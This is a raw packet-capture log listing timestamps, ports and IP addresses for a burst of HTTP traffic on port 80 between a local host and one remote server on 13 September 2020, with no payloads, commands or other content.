Sep 13, 2020 20:55:13.252353907 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252370119 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252382994 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252394915 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252408028 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252419949 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252432108 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252444029 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252456903 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252469063 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252481937 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252492905 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252506971 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252517939 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252531052 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252540112 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.252542019 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252551079 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252558947 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252566099 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252573013 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252600908 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252613068 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252624035 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252722025 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252744913 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252760887 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252773046 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252780914 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252780914 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.252787113 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252794027 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252921104 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.277426958 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277477026 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277494907 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277512074 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277529001 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277574062 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277581930 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277602911 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277652025 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277688980 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277703047 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277721882 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277735949 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277750969 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277761936 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.277769089 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277781010 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277793884 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277806044 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277822971 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277837038 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277848959 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277864933 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277883053 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277896881 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277904034 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277919054 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277932882 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277940989 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277954102 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277966976 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277980089 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.277997017 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278013945 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278026104 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.278028011 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278039932 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278053045 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278065920 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278094053 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278106928 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278120041 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278134108 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278148890 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278166056 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278187990 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278209925 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278244972 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.278249025 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278280020 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278292894 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278301001 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278306961 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278314114 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278321028 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278327942 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278333902 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278340101 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278347015 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278352976 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278359890 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278366089 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278374910 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278383017 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278388977 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278397083 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278403997 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278410912 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278418064 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278424978 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278431892 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278439045 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278446913 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278450966 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.278454065 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278460979 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278466940 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278474092 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278480053 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278486013 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278554916 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278567076 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.278568983 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278578997 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278587103 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278598070 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278609037 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278620958 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278631926 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278645039 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278656960 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278669119 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278681993 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278693914 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278704882 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.278706074 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278714895 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278723001 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278733015 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278743982 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278755903 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278767109 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278779030 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278789997 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278800964 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278811932 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278824091 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278836966 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278848886 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278862000 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278873920 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278882980 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.278886080 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278894901 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278903008 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278913021 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278923988 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278935909 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278949022 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278960943 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278973103 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278985023 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.278996944 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.279010057 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.279021978 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.279026031 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.279033899 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.279042006 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.279052973 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.279063940 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.279074907 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.279087067 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.279099941 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.279112101 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.279124975 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.279155970 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.279169083 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.279189110 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.279201031 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.279212952 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.279225111 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.279236078 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.279257059 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.279386997 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.302191019 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302202940 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302210093 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302220106 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302234888 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302238941 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302259922 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302309990 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302324057 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302351952 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302362919 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302380085 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302386999 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302393913 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302402973 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302412987 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302424908 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302438974 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302453995 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302469015 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302478075 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.302486897 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302500010 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302512884 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302529097 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302546024 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302558899 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302572012 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302587986 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302606106 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302613974 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302625895 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302633047 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302645922 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302658081 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302701950 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302711010 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302723885 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302742004 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302757978 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302776098 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302810907 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302833080 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302860975 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302877903 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302903891 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302927971 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302953005 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302958012 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.302973032 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.302998066 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303025961 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303050995 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303083897 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303109884 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303133965 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303159952 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303184986 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303200960 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303220034 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.303225994 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303240061 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303263903 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303293943 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303320885 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303348064 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303376913 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303406954 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303436995 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303463936 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303489923 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303514957 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303531885 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.303543091 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303570986 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303591967 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303617954 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303642988 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303667068 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303690910 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303694010 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.303716898 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303735971 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303761005 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303776979 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303787947 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303817987 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303822994 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303845882 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303867102 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303877115 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303900957 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303915024 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303926945 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303939104 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303951979 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303960085 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.303981066 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304001093 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304008961 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304016113 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.304018021 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304024935 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304030895 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304038048 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304044008 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304054022 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304064989 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304076910 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304086924 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304095984 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304102898 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304111004 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304121971 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304132938 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304147005 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304158926 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304172039 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304183960 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304195881 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304208040 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304219961 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304233074 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304244995 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304256916 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304269075 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304281950 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304294109 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304306030 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304317951 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304331064 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304342985 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304356098 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304367065 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304374933 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304383993 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304393053 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304403067 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304413080 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.304414988 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304423094 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304430962 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.304553032 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.328233004 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328248978 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328260899 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328272104 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328284979 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328309059 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328336000 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328366041 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328391075 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328392982 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.328414917 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328425884 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.328454971 CEST	80	49723	47.245.136.23	192.168.2.3
